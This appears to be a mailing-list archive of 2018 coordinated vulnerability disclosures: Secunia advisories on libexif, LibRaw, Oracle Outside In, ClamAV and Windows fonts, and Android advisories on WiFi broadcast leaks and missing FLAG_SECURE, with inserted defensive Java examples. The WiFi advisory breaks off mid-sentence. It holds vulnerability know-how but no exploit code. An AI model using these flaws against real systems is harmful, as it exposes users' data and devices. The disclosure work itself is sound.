Secunia Research: libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF Denial of Service Vulnerability

2018-12-17 Thread Secunia Research
==

Secunia Research 2018/12/13

   libexif EXIF_IFD_INTEROPERABILITY / EXIF_IFD_EXIF
  Denial of Service Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* libexif version 0.6.21. Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in libexif, which can
be exploited by malicious people to cause a DoS (Denial of Service).

1) An error when processing the EXIF_IFD_INTEROPERABILITY and
EXIF_IFD_EXIF tags can be exploited to exhaust available CPU
resources.

The vulnerability is confirmed in version 0.6.21. Other versions may
also be affected.

==
4) Solution

No official solution is currently available.

==
5) Time Table

2018/09/12 - Maintainer contacted with the vulnerability details.
2018/09/27 - Maintainer contacted for a follow-up.
2018/09/28 - Maintainer confirmed the vulnerability.
2018/11/13 - Maintainer contacted for a follow-up highlighting
 disclosure policy margins.
2018/12/12 - Release of Secunia Advisory SA84652 based on the
 disclosure policy.
2018/12/13 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-20030 identifier for the vulnerability.

==
8) About Flexera

Flexera helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexera.com

Flexera delivers market-leading Software Vulnerability Management
solutions enabling enterprises to proactively identify and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

https://www.flexera.com/products/software-vulnerability-management

Flexera supports and contributes to the community in several
ways. We have always believed that reliable vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be freely available for consumers to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated and stay secure. End-users (whether private
individuals or businesses) are otherwise left largely alone, and
that is why back in 2002, Secunia Research started investigating,
coordinating disclosure and verifying software vulnerabilities.
In 2016, Secunia Research became a part of Flexera and today
our in-house software vulnerability research remains the core of
the Software Vulnerability Management products at Flexera.

https://www.flexera.com/company/secunia-research/

The public Secunia Advisory database contains information for
researchers, security enthusiasts, and consumers to look up individual
products and vulnerabilities and assess whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered.

https://www.flexera.com/company/secunia-research/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-28/

Complete list of vulnerability reports published by Secunia Research:
https://www.flexera.com/company/secunia-research/advisories/

==



Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2018-12-17 Thread Secunia Research
==

Secunia Research 2018/12/13

 LibRaw Multiple Denial of Service Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* LibRaw versions prior to 0.19.1.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to cause a DoS
(Denial of Service).

1) A type confusion error within the "unpacked_load_raw()" function
(internal/dcraw_common.cpp) can be exploited to trigger an infinite
loop.

2) An error within the "parse_rollei()" function
(internal/dcraw_common.cpp) can be exploited to trigger an infinite
loop.

3) An error within the "parse_sinar_ia()" function
(internal/dcraw_common.cpp) can be exploited to exhaust available
CPU resources.

The vulnerabilities are confirmed in version 0.19.0 and reported in
versions prior to 0.19.1.

==
4) Solution

Update to version 0.19.1.

==
5) Time Table

2018/11/22 - Maintainer contacted with the vulnerability details.
2018/11/23 - Maintainer confirmed the vulnerability.
2018/11/23 - Maintainer released a fix.
2018/12/03 - Release of Secunia Advisory SA86384.
2018/12/13 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-5817, CVE-2018-5818, and CVE-2018-5819 identifiers for
the vulnerabilities.

==
9) Verification

Please verify this advisory by visiting the website:
https://www.flexera.com/company/secunia-research/advisories/SR-2018-27.html

Complete list of vulnerability reports published by Secunia Research:
https://www.flexera.com/company/secunia-research/advisories/

==



Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

2018-08-30 Thread research
[Blog post here:
https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/]

TITLE

Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

SUMMARY

System broadcasts by Android OS expose information about the user’s
device to all applications running on the device. This includes the
WiFi network name, BSSID, local IP addresses, DNS server information
and the MAC address. Some of this information (MAC address) is no
longer available via APIs on Android 6 and higher, and extra
permissions are normally required to access the rest of this
information. However, by listening to these broadcasts, any
application on the device can capture this information thus bypassing
any permission checks and existing mitigations.

Because MAC addresses do not change and are tied to hardware, this can
be used to uniquely identify and track any Android device even when
MAC address randomization is used. The network name and BSSID can be
used to geolocate users via a lookup against a database of BSSID such
as WiGLE or SkyHook. Other networking information can be used by rogue
apps to further explore and attack the local WiFi network.

All versions of Android running on all devices are believed to be
affected including forks (such as Amazon’s FireOS for the Kindle). The
vendor (Google) fixed these issues in Android P / 9 but does not plan
to fix older versions. Users are encouraged to upgrade to Android P /
9 or later. CVE-2018-9489 has been assigned by the vendor to track
this issue. Further research is also recommended to determine whether
this is being exploited in the wild.

BACKGROUND

Android is an open source operating system developed by Google for
mobile phones and tablets. It is estimated that over two billion
devices exist worldwide running Android. Applications on Android are
usually segregated by the OS from each other and the OS itself.
However, interaction between processes and/or the OS is still possible
via several mechanisms.

In particular, Android provides “Intents” as one of its mechanisms for
inter-process communication. A broadcast using an “Intent” allows an
application or the OS to send a message system-wide which can be
listened to by other applications. While functionality exists to
restrict who is allowed to read such messages, application developers
often neglect to implement these restrictions properly or to mask
sensitive data. This leads to a common vulnerability within Android
applications where a malicious application running on the same device
can spy on and capture messages being broadcast by other applications.
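The restriction mechanism the paragraph refers to is a broadcast permission: the sender names a permission that receivers must hold, and a receiver can in turn require senders to hold it. The example below is added here and is not code from the advisory or from Android itself; the package name, the permission name, the action string and the "account" extra are all hypothetical. It shows the weak and hardened forms of the same app-level broadcast side by side.

```java
package com.example.app; // hypothetical package, not from the advisory

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;

// Added example: the same app-level broadcast sent without and with a
// receiver permission. Assumes the app declares in AndroidManifest.xml:
//   <permission android:name="com.example.app.permission.SESSION_EVENTS"
//               android:protectionLevel="signature" />
// so only apps signed with the same key as this one can hold it.
public final class SessionEvents {
    public static final String PERMISSION =
            "com.example.app.permission.SESSION_EVENTS";
    public static final String ACTION_SESSION_CHANGED =
            "com.example.app.action.SESSION_CHANGED";

    private SessionEvents() {}

    // Weak form: an implicit, unrestricted broadcast. Every installed app
    // with a receiver for ACTION_SESSION_CHANGED can read the extras, which
    // is the pattern the advisory describes for the OS's own WiFi intents.
    public static void broadcastUnrestricted(Context ctx, String accountId) {
        Intent i = new Intent(ACTION_SESSION_CHANGED);
        i.putExtra("account", accountId);
        ctx.sendBroadcast(i);
    }

    // Hardened form: receivers must hold PERMISSION, and setPackage() makes
    // the broadcast explicit so it is never delivered outside this app.
    public static void broadcastRestricted(Context ctx, String accountId) {
        Intent i = new Intent(ACTION_SESSION_CHANGED);
        i.setPackage(ctx.getPackageName());
        i.putExtra("account", accountId);
        ctx.sendBroadcast(i, PERMISSION);
    }

    // Receiver side of the same contract: the broadcastPermission argument
    // means only senders holding PERMISSION can deliver to this receiver, so
    // another app cannot inject a spoofed session event either.
    public static void registerListener(Context ctx, BroadcastReceiver receiver) {
        IntentFilter filter = new IntentFilter(ACTION_SESSION_CHANGED);
        ctx.registerReceiver(receiver, filter, PERMISSION, null);
    }
}
```

A signature-level permission is the right protection level here: a "normal" permission would be granted to any app that asks for it, which is no restriction at all. Apps targeting API 33 or later should use the `registerReceiver` overload that also takes `RECEIVER_NOT_EXPORTED` flags; the four-argument form shown is the one available on the Android versions the advisory covers.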

Another security mechanism in Android is permissions. These are
safeguards designed to protect the privacy of users. Applications must
explicitly request access to certain information or features via a
special “uses-permission” tag in the application manifest
(“AndroidManifest.xml”). Depending on the type of permission
(“normal”, “dangerous”, etc.), the OS may display the permission
information to the user during installation, or may prompt again at
run-time. Some permissions can only be used by system applications and
cannot be used by regular developers.

VULNERABILITY DETAILS

Android OS broadcasts information about the WiFi connection and the
WiFi network interface on a regular basis using two intents:
WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s
WIFI_P2P_THIS_DEVICE_CHANGED_ACTION. This information includes the MAC
address of the device, the BSSID and network name of the WiFi access
point, and various networking information such as the local IP range,
gateway IP and DNS server addresses. This information is available to
all applications running on the user’s device.

While applications can also access this information via the
WifiManager, this normally requires the “ACCESS_WIFI_STATE” permission
in the application manifest. Geolocation via WiFi normally requires
the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.
Also, on Android versions 6.0 and later, the real MAC address of the
device is no longer available via APIs, which always return the
address “02:00:00:00:00:00” instead. However, an application listening
for system broadcasts does not need these permissions, so this
information can be captured without the knowledge of the user, and the
real MAC address can be captured even on Android 6 or higher.

We performed testing using a test farm of mobile devices ranging across
multiple types of hardware and Android versions. All devices and
versions of Android tested confirmed this behavior, although some
devices do not display the real MAC address in the
“NETWORK_STATE_CHANGED_ACTION” intent but they still do within the
“WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent. We also tested at least
one fork (Amazon’s FireOS for the Kindle) and those devices displayed
the same behavior.

Because MAC addresses do not change and are tied to hardware

Secunia Research: Oracle Outside In Technology Multiple Vulnerabilities

2018-07-20 Thread Secunia Research
==

Secunia Research 2018/07/20

   Oracle Outside In Technology Multiple Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Oracle Outside In Technology version 8.5.3.

==
2) Severity

Rating: Moderately critical
Impact: Exposure of sensitive information and Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in 
Oracle Outside In Technology, which can be exploited by malicious 
people to disclose potentially sensitive information and 
cause a DoS (Denial of Service).

1) An error in the vsxl5.dll when processing GelFrame objects can be
exploited to cause an out-of-bounds read memory access.

2) An integer underflow error in the vsxl5.dll can be exploited to
cause an out-of-bounds read memory access.

3) An error when processing the "Body" element of an HTML file can be
exploited to cause a null pointer dereference.

4) An error within the "readChartStyles()" function (vswk6.dll)
can be exploited to cause a null pointer dereference.

5) An error in the vswk6.dll can be exploited to cause an
out-of-bounds read memory access.

6) An error within the "readChartStyles()" function (vswk6.dll)
can be exploited to trigger an infinite loop.

7) An error within the vswk6.dll can be exploited to disclose
uninitialized memory or cause a crash.

8) Another error within the vswk6.dll can be exploited to
disclose uninitialized memory or cause a crash.

9) Another error within the vswk6.dll can be exploited to
disclose uninitialized memory or cause a crash.

10) Another error within the vswk6.dll can be exploited to
disclose uninitialized memory or cause a crash.

The vulnerabilities are confirmed in version 8.5.3. Other versions may
also be affected.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2394520.1

==
5) Time Table

2018/03/26 - Vendor notified about vulnerabilities.
2018/03/29 - Vendor supplied bug ticket ID.
2018/05/25 - Vendor status update.
2018/06/06 - Vendor asks for additional details.
2018/06/06 - Vendor is provided with further analysis of the
 vulnerabilities.
2018/06/26 - Vendor supplies information on fix in main codeline.
2018/07/17 - Release of vendor patch.
2018/07/18 - Release of Secunia Advisory SA81459.
2018/07/20 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-2992, CVE-2018-3009, CVE-2018-3093,
CVE-2018-3094, CVE-2018-3095, CVE-2018-3096, CVE-2018-3098,
CVE-2018-3097, CVE-2018-3103, and CVE-2018-3104 identifiers for the
vulnerabilities.


Secunia Research: Oracle Outside In Technology Multiple Vulnerabilities

2018-07-20 Thread Secunia Research
==

Secunia Research 2018/07/20

   Oracle Outside In Technology Multiple Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Oracle Outside In Technology version 8.5.3.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  Remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in 
Oracle Outside In Technology, which can be exploited by malicious 
people to compromise a vulnerable system.

1) An error within the "VwStreamRead()" function (vsdrw.dll) can be 
exploited to cause a heap-based buffer overflow.

2) A boundary error in the vsxl5.dll can be exploited to cause a 
heap-based buffer overflow.

3) Another boundary error in the vsxl5.dll can be exploited to cause 
a heap-based buffer overflow.

4) An integer underflow error within the "VwStreamOpen()" function
(vswk6.dll) can be exploited to cause an out-of-bounds write memory 
access.

The vulnerabilities are confirmed in version 8.5.3. Other versions may
also be affected.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2394520.1

==
5) Time Table

2018/03/26 - Vendor notified about vulnerabilities.
2018/03/29 - Vendor supplied bug ticket ID.
2018/05/25 - Vendor status update.
2018/06/06 - Vendor asks for additional details.
2018/06/06 - Vendor is provided with further analysis of the
 vulnerabilities.
2018/06/26 - Vendor supplies information on fix in main codeline.
2018/07/17 - Release of vendor patch.
2018/07/18 - Release of Secunia Advisory SA81459.
2018/07/20 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-3102, CVE-2018-3010, CVE-2018-3092, and
CVE-2018-3099 identifiers for the vulnerabilities.


Secunia Research: LibRaw "parse_minolta()" Infinite Loop Denial of Service Vulnerability

2018-07-20 Thread Secunia Research
==
 
Secunia Research 2018/07/17
 
   LibRaw "parse_minolta()" Infinite Loop 
   Denial of Service Vulnerability
 
==
Table of Contents
 
1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification
 
==
1) Affected Software

* LibRaw versions prior to 0.18.11.
 
==
2) Severity
 
Rating: Moderately critical
Impact: Denial of Service
Where:  From remote
 
==
3) Description of Vulnerability
 
Secunia Research has discovered a vulnerability in LibRaw, which can
be exploited by malicious people to cause a DoS (Denial of Service). 

1) An error within the "parse_minolta()" function (dcraw/dcraw.c) can
be exploited to trigger an infinite loop via a specially crafted file. 

The vulnerability is confirmed in version 0.18.10. Prior versions may
also be affected.
 
==
4) Solution
 
Update to version 0.18.11.
 
==
5) Time Table
 
2018/05/09 - Maintainer contacted with the vulnerability details.
2018/05/10 - Maintainer confirmed the vulnerability.
2018/05/10 - Maintainer released a fix.
2018/05/15 - Release of Secunia Advisory SA83050.
2018/07/19 - Public disclosure of Secunia Research Advisory.
 
==
6) Credits
 
Kasper Leigh Haabb, Secunia Research at Flexera
 
==
7) References
 
The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-5813 identifier for the vulnerability.
 
 
==
9) Verification
 
Please verify this advisory by visiting the Secunia Research website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-13/
 
==


Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2018-07-20 Thread Secunia Research
==

Secunia Research 2018/07/17
  LibRaw Multiple Denial of Service Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* LibRaw versions prior to 0.18.12.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to cause a DoS (Denial of 
Service). 

1) An integer overflow error within the "parse_qt()" function 
(internal/dcraw_common.cpp) can be exploited to trigger an 
infinite loop via a specially crafted Apple QuickTime file.

2) An integer overflow error within the "identify()" function
(internal/dcraw_common.cpp) can be exploited to trigger a
division by zero via a specially crafted NOKIARAW file.

Note: Vulnerability #2 is due to an incomplete fix for
CVE-2018-5804.

The vulnerabilities are confirmed in version 0.18.11. Prior versions 
may also be affected.

==
4) Solution

Update to version 0.18.12.

==
5) Time Table

2018/06/08 - Maintainer contacted with the vulnerability details.
2018/06/11 - Maintainer confirmed the vulnerabilities.
2018/06/11 - Maintainer released a fix.
2018/06/13 - Release of Secunia Advisory SA83507.
2018/07/19 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Kasper Leigh Haabb, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-5815 and CVE-2018-5816 identifiers for the 
vulnerabilities.


==
9) Verification

Please verify this advisory by visiting the Secunia Research website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-14/

==


Secunia Research: Clam AntiVirus "parsehwp3_paragraph()" Denial of Service Vulnerability

2018-07-13 Thread Secunia Research
==

Secunia Research 2018/07/12

   Clam AntiVirus "parsehwp3_paragraph()"
  Denial of Service Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* Clam AntiVirus versions prior to 0.100.1.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Clam AntiVirus,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

1) An integer overflow error within the "parsehwp3_paragraph()"
function (libclamav/hwp.c) can be exploited to trigger an infinite
loop via a specially crafted Hangul Word Processor file.

The vulnerability is confirmed in version 0.100.0 and reported in
versions prior to 0.100.1.

==
4) Solution

Update to version 0.100.1.

==
5) Time Table

2018/05/18 - Maintainer contacted with the vulnerability details.
2018/05/21 - Maintainer confirmed the vulnerability.
2018/07/09 - Maintainer released a fix.
2018/07/11 - Release of Secunia Advisory SA82000.
2018/07/12 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2018-0360 identifier for the vulnerability.


==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexera.com/secunia_research/2018-12

==


Android OS Didn't use FLAG_SECURE for Sensitive Settings [CVE-2017-13243]

2018-05-25 Thread research
[Blog post here:
https://wwws.nightwatchcybersecurity.com/2018/05/24/android-os-didnt-use-flag_secure-for-sensitive-settings-cve-2017-13243/]

SUMMARY

Android OS did not use the FLAG_SECURE flag for sensitive settings,
potentially exposing sensitive data to other applications on the same
device that hold screen capture permissions. The vendor (Google) fixed
this issue in the 2018-02-01 Pixel security update. Google has assigned
CVE-2017-13243 to track this issue.

DETAILS

Android OS is a mobile operating system for phones and tablets
developed by Google. The OS has multiple screens where sensitive
information may be shown, such as the device lock screen, passwords in
the WiFi settings, pairing codes for Bluetooth, etc.

FLAG_SECURE is a special flag available to Android developers that
prevents a particular screen within an application from being seen by
other applications with screen capture permissions, from having
screenshots taken by the user, and from being captured in the “Recent
Apps” portion of Android OS. We published an extensive post last year
discussing what this feature is and what it does:
https://wwws.nightwatchcybersecurity.com/2016/04/13/research-securing-android-applications-from-screen-capture/
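For developers who own such a screen, the fix is a single window flag. The following activity is an added example, not code from the advisory or from Android's settings app; the package name and the layout resource are hypothetical. It goes one step beyond the text by also covering dialogs, which have their own Window and therefore do not inherit the activity's flag, the case that matters for pairing-code and password prompts.

```java
package com.example.app; // hypothetical package, not from the advisory

import android.app.Activity;
import android.app.Dialog;
import android.os.Bundle;
import android.view.Window;
import android.view.WindowManager;

// Added example: a credential-entry screen that opts out of screen capture,
// the mitigation the advisory describes. R.layout.credential_entry is a
// hypothetical layout resource.
public class CredentialEntryActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Set the flag before the first frame is drawn so the screen never
        // appears in user screenshots, the "Recent Apps" thumbnail, or a
        // MediaProjection capture started by another app.
        markSecure(getWindow());
        setContentView(R.layout.credential_entry);
    }

    // A Dialog has its own Window, so the activity's flag does not cover it;
    // a pairing-code or password dialog needs the flag applied separately
    // before it is shown.
    protected void showSecureDialog(Dialog dialog) {
        Window w = dialog.getWindow();
        if (w != null) {
            markSecure(w);
        }
        dialog.show();
    }

    // Single place to apply the flag; addFlags() keeps any flags already set.
    static void markSecure(Window window) {
        window.addFlags(WindowManager.LayoutParams.FLAG_SECURE);
    }
}
```

The flag is per-window, not per-app, so every screen that shows a secret (lock screen, WiFi password entry, Bluetooth pairing code in the advisory's case) has to set it individually; a quick check during review is to take a screenshot on each such screen, exactly as the reproduction steps below describe, and confirm the result is black.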

During our testing of various Google mobile applications, we found
that the lock screen, the password entry screen for WiFi, and the
screen for entering pairing codes for Bluetooth devices did not use
FLAG_SECURE to prevent other applications from capturing that
information. By contrast, other Google applications like Android Pay
and Google Wallet use this flag to prevent capture of sensitive
information. Exploiting this bug requires user cooperation in
installing a malicious app and activating the actual screen capture
process, thus the likelihood of exploitation is low.

To reproduce:
1. Lock the device, OR go to WiFi settings and try to add a network,
or try to pair a Bluetooth device.
2. Press Power and volume down to capture screenshot.
3. Confirm that a screenshot can be taken.

All testing was done on Android 7.1.2, security patch level of May
5th, 2017, on Nexus 6P. Vulnerable versions of Android include: 5.1.1,
6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 and 8.0.
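Added example of the mitigation this advisory points to (not Google's code and not from the Nightwatch post): a hypothetical Android screen that applies FLAG_SECURE to its own window before attaching content, and also to a password dialog, which has a separate Window of its own. The package and class names are made up; it assumes a standard Android SDK project.

```java
package com.example.securescreen; // hypothetical package

import android.app.Activity;
import android.app.AlertDialog;
import android.app.Dialog;
import android.os.Bundle;
import android.text.InputType;
import android.view.Window;
import android.view.WindowManager;
import android.widget.EditText;

/** Hypothetical screen that shows a secret, e.g. a Wi-Fi password entry. */
public class WifiPasswordActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Hardened form. Without this call the screen is in the state the
        // advisory describes: user screenshots, MediaProjection capture and
        // the "Recent Apps" thumbnail all see the secret. The flag must be
        // in place before the first frame is drawn, so it goes before
        // setContentView().
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                             WindowManager.LayoutParams.FLAG_SECURE);

        EditText password = new EditText(this);
        password.setInputType(InputType.TYPE_CLASS_TEXT
                | InputType.TYPE_TEXT_VARIATION_PASSWORD);
        setContentView(password);
    }

    /**
     * A Dialog is its own Window; the activity's flags do not propagate to
     * it. The same holds for DialogFragment and any other window you create,
     * which is why a pairing-code or password dialog needs the flag too.
     */
    void showPairingCodeDialog() {
        EditText code = new EditText(this);
        code.setInputType(InputType.TYPE_CLASS_NUMBER);
        Dialog dialog = new AlertDialog.Builder(this)
                .setTitle("Bluetooth pairing code")
                .setView(code)
                .setPositiveButton(android.R.string.ok, null)
                .create();
        applySecureFlag(dialog); // before show(), so the first frame is protected
        dialog.show();
    }

    /** Adds FLAG_SECURE to a dialog's window, guarding the nullable getter. */
    static void applySecureFlag(Dialog dialog) {
        Window window = dialog.getWindow();
        if (window != null) {
            window.addFlags(WindowManager.LayoutParams.FLAG_SECURE);
        }
    }
}
```

Verification mirrors the reproduction steps above: with the flag applied, the screenshot is blocked and the Recents thumbnail no longer shows the screen content.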

VENDOR RESPONSE

This issue was responsibly reported to the vendor and was fixed in the
2018-02-01 Pixel bulletin. The vendor assigned CVE-2017-13243 to track
this issue.

BOUNTY INFORMATION

This issue satisfied the requirements of the Android Security Rewards
program and a bounty was paid.

REFERENCES

Android ID # A-38258991
CVE ID: CVE-2017-13243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13243
CVSS scores: 7.5 (CVSS v3.0) / 5.0 (CVSS v2.0)
Google Bug # 38254822
Google Pixel Bulletin: 2018-02-01
https://source.android.com/security/bulletin/pixel/2018-02-01

CREDITS

Advisory written by Yakov Shafranovich.

TIMELINE

2017-05-12: Initial report to the vendor
2017-06-15: Follow-up information sent to the vendor
2017-06-19: Follow-up communication with the vendor
2018-01-02: Vendor communicates plan to patch this issue
2018-01-29: Bounty reward issued
2018-02-01: Vendor publishes a patch for this issue
2018-05-24: Public disclosure / advisory published


Secunia Research: Oracle Outside In Technology Use-After-Free Vulnerability

2018-04-25 Thread Secunia Research
==

Secunia Research 2018/04/25

Oracle Outside In Technology Use-After-Free Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

Oracle Outside In Technology version 8.5.3.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  Remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In 
Technology, which can be exploited by malicious people to compromise 
a vulnerable system.

1) A use-after-free error in vshtml.dll within the "Outside In
Filters" subcomponent can be exploited to corrupt memory.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2353306.1

==
5) Time Table

2017/11/08 - Vendor notified about vulnerability.
2017/11/14 - Vendor supplied bug ticket ID.
2017/11/26 - Vendor status update.
2017/12/05 - Vendor asks for additional details.
2017/12/06 - Vendor is provided with further analysis of the
 vulnerability.
2017/12/26 - Vendor supplies information of fix in main codeline.
2018/04/17 - Release of vendor patch.
2018/04/17 - Release of Secunia Advisory SA72227.
2018/04/25 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-2806 identifier for the vulnerability.

==
8) About Flexera
 
http://www.flexera.com

https://www.flexera.com/enterprise/products/

https://www.flexera.com/enterprise/company/about/secunia-research/

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-07/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Microsoft Windows Embedded OpenType Font Engine hdmx Table Information Disclosure Vulnerability

2018-03-22 Thread Secunia Research
==

Secunia Research 2018/03/15

  Microsoft Windows Embedded OpenType Font Engine hdmx Table
  Information Disclosure Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Microsoft Windows 7

* Microsoft Windows Server 2008

==
2) Severity

Rating: Moderately critical
Impact: Information Disclosure
Where:  Remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to disclose certain
information.

The vulnerability is caused due to an error when processing the hdmx
table and can be exploited to cause an out-of-bounds read memory access.

==
4) Solution

Apply update.

==
5) Time Table

2017/12/06 - Reported vulnerability.
2017/12/07 - Vendor status update.
2017/12/15 - Vendor notified about vulnerability.
2018/02/13 - Vendor patch release.
2018/02/14 - Secunia Advisory SA7 release.
2018/03/14 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Hossein Lotfi, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-0761 identifier for the vulnerability.

==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

http://secunia.com/secunia_research/

http://secunia.com/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-05/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Microsoft Windows Embedded OpenType Font Engine "MTX_IS_MTX_Data()" Information Disclosure Vulnerability

2018-03-22 Thread Secunia Research
==

Secunia Research 2018/03/15

 Microsoft Windows Embedded OpenType Font Engine "MTX_IS_MTX_Data()"
   Information Disclosure Vulnerability
==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Microsoft Windows 7

* Microsoft Windows Server 2008

==
2) Severity

Rating: Moderately critical
Impact: Information Disclosure
Where:  Remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to disclose certain
information.

The vulnerability is caused due to an error within the
"MTX_IS_MTX_Data()" function (t2embed.dll) and can be exploited to
cause an out-of-bounds read memory access.

==
4) Solution

Apply update.

==
5) Time Table

2017/11/03 - Vendor notified about vulnerability.
2017/11/03 - Vendor response.
2017/11/05 - Vendor status update.
2017/11/13 - Replied to vendor.
2017/11/15 - Vendor status update.
2017/11/22 - Vendor status update.
2017/11/30 - Vendor status update.
2018/02/13 - Vendor patch release.
2018/02/14 - Secunia Advisory SA7 release.
2018/03/14 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Hossein Lotfi, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-0755 identifier for the vulnerability.

==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

http://secunia.com/secunia_research/

http://secunia.com/advisories/
